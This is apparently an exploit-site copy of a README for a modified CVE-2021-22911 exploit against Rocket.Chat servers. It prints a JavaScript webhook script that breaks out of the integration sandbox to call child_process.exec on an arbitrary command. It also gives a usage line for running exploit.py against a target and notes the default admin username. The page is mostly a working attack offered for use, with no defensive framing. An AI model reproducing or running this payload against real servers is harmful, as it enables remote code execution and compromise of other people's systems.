## https://sploitus.com/exploit?id=20192387-7625-5BDB-89FD-50906A88FDBD
# CVE-2021-22911-EXP
## Info
Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:
1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.
```javascript
class Script {
process_incoming_request({ request }) {
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('your command');
}
}
```
## Notice
1. You can check if the webhook has been executed successfully using the `wegt` command, provided that you have installed this command in the Docker container.
2. The default administrator username in the code is `admin`.
## Usage
```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```